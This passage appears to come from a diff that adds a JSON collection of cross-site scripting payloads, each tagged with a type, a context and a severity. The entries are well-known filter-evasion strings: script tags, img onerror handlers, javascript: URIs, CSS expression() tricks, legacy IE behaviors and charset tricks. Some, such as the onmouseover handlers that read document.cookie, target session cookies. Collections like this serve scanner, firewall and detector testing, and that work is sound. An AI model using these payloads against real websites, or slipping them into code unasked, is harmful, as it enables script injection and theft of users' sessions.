foo=\"]foo><script>javascript:alert(1)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<% foo><x foo=\"%><script>javascript:alert(1)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<div id=d><x xmlns=\"><iframe onload=javascript:alert(1)\"></div> <script>d.innerHTML=d.innerHTML</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img \\x00src=x onerror=\"alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img \\x47src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img \\x11src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img \\x12src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img\\x47src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img\\x10src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img\\x13src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img\\x32src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img\\x11src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img \\x34src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img \\x39src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img \\x00src=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src\\x09=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src\\x10=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src\\x13=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src\\x32=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src\\x12=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src\\x11=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src\\x00=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src\\x47=x onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x\\x09onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x\\x10onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x\\x11onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x\\x12onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x\\x13onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x onerror=\\x09\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x onerror=\\x10\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x onerror=\\x11\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x onerror=\\x12\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x onerror=\\x32\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=x onerror=\\x00\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src onerror /\" '\"= alt=javascript:alert(1)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<title onpropertychange=javascript:alert(1)></title><title title=>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<!--[if]><script>javascript:alert(1)</script -->", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<!--[if<img src=x onerror=javascript:alert(1)//]> -->", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object> <object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"javascript:alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style>@import \"data:,*%7bx:expression(javascript:alert(1))%7D\";</style>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"javascript:alert(1);\">XXX</a></a><a href=\"javascript:javascript:alert(1)\">XXX</a>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<// style=x:expression\\28javascript:alert(1)\\29>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style>*{x:expression(javascript:alert(1))}</style>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<div style=\"list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));\">X", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<meta charset=\"mac-farsi\">¼script¾javascript:alert(1)¼/script¾", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:javascript:alert(1)\">XXX</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<event-source src=\"%(event)s\" onload=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javascript:javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<div id=\"x\">x</div> <xml:namespace prefix=\"t\"> <import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;\">", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\"javascript:javascript:alert(1);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=javascript:javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=`javascript:javascript:alert(1)`>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<FRAMESET><FRAME SRC=\"javascript:javascript:alert(1);\"></FRAMESET>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BODY ONLOAD=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BODY ONLOAD=javascript:javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\"jav\tascript:javascript:alert(1);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\"javascript:javascript:alert(1)\"", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:javascript:alert(1);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG DYNSRC=\"javascript:javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG LOWSRC=\"javascript:javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BGSOUND SRC=\"javascript:javascript:alert(1);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BR SIZE=\"&{javascript:alert(1)}\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<LINK REL=\"stylesheet\" HREF=\"javascript:javascript:alert(1);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE>li {list-style-image: url(\"javascript:javascript:alert(1)\");}</STYLE><UL><LI>XSS", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:javascript:alert(1);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:javascript:alert(1);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IFRAME SRC=\"javascript:javascript:alert(1);\"></IFRAME>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<TABLE BACKGROUND=\"javascript:javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<TABLE><TD BACKGROUND=\"javascript:javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<DIV STYLE=\"background-image: url(javascript:javascript:alert(1))\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<DIV STYLE=\"width:expression(javascript:alert(1));\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG STYLE=\"xss:expr/*XSS*/ession(javascript:alert(1))\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<XSS STYLE=\"xss:expression(javascript:alert(1))\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE TYPE=\"text/javascript\">javascript:alert(1);</STYLE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE>.XSS{background-image:url(\"javascript:javascript:alert(1)\");}</STYLE><A CLASS=XSS></A>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:javascript:alert(1)\")}</STYLE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BASE HREF=\"javascript:javascript:alert(1);//\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"%(htc)s\"><xss:xss>XSS</xss:xss></HTML>\"\"\",\"XML namespace.\"),(\"\"\"<XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:javascript:alert(1)\"&gt;</B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;\"></BODY></HTML>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<form id=\"test\" /><button form=\"test\" formaction=\"javascript:javascript:alert(1)\">X", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<P STYLE=\"behavior:url('#default#time2')\" end=\"0\" onEnd=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<meta charset= \"x-imap4-modified-utf7\"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style onreadystatechange=javascript:javascript:alert(1);></style>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<?xml version=\"1.0\"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<embed code=javascript:javascript:alert(1);></embed>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<frameset onload=javascript:javascript:alert(1)></frameset>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<object onerror=javascript:javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]<![CDATA[cript:javascript:alert(1);\">]]</C><X></xml>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=&{javascript:alert(1);};>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"jav&#65ascript:javascript:alert(1)\">test1</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"jav&#97ascript:javascript:alert(1)\">test1</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe srcdoc=\"&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>\">", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\"javascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=javascript:alert('XSS')>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=JaVaScRiPt:alert('XSS')>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=javascript:alert(\"XSS\")>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a onmouseover=\"alert(document.cookie)\">xxs link</a>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "critical", + "source": "xss_alert" + } + }, + { + "payload": "<a onmouseover=alert(document.cookie)>xxs link</a>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "critical", + "source": "xss_alert" + } + }, + { + "payload": "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\"jav\tascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\" &#14; javascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC=\"javascript:alert('XSS')\"", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\\\";alert('XSS');//", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BODY BACKGROUND=\"javascript:alert('XSS')\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG DYNSRC=\"javascript:alert('XSS')\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG LOWSRC=\"javascript:alert('XSS')\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG SRC='vbscript:msgbox(\"XSS\")'>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert" + } + }, + { + "payload": "<BODY ONLOAD=alert('XSS')>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BGSOUND SRC=\"javascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BR SIZE=\"&{alert('XSS')}\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "style", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE 